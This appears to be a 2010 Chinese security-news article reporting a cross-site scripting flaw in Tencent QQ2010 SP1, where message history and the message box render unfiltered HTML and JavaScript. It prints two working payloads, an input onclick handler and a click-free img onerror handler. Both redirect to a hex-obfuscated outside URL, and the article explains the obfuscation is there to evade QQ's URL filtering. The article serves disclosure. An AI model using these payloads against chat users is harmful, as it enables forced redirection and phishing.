热门关键字:   网站安全  系统安全  安全漏洞  黑客攻防  网络安全

腾讯QQ2010SP1存在严重漏洞

发布时间:2010-07-29 11:19文章来源:网络文章作者:消息 点击次数:
摘要:2010-07-28消息: 腾讯QQ一向是腾讯主打的产品,意想不到前天发布的QQ2010SP1竟然有如此大漏洞。 首先囧一下:脚本出错还会提示错误 1、消息记录的Javascript、Html标签没有屏蔽 2、消息盒子Javascript、Html标签没有屏蔽 3、小实验 1、发送代码:input oncli...

2010-07-28消息:

腾讯QQ一向是腾讯主打的产品,意想不到前天发布的QQ2010SP1竟然有如此大漏洞
首先囧一下:脚本出错还会提示错误

image

1、消息记录的Javascript、Html标签没有屏蔽

 



2、消息盒子Javascript、Html标签没有屏蔽

 



3、小实验

1、发送代码:<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />

因为腾讯会自动将url转换,我们必须混淆url才能发送

 



 



 



4、超牛代码

<img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>

因为要点击才能触发,想到一个不用点击就能触发的代码。

5、希望腾讯快点修复,这个漏洞非同小可

6、本漏洞由TGL发现。

 



注意,本代码仅供研究之用,请勿用于不当用途。
如打算规避漏洞带来的风险,请
下载SP0版本,看来SP1版本的changelog得修改为“更新了一些漏洞”。

 

标签分类: 漏洞 播报

上一篇:黑客偷拍女网友裸照 敲诈勒索一万元
下一篇:黑帽大会公布伪装的Android手机壁纸可偷窃个人信息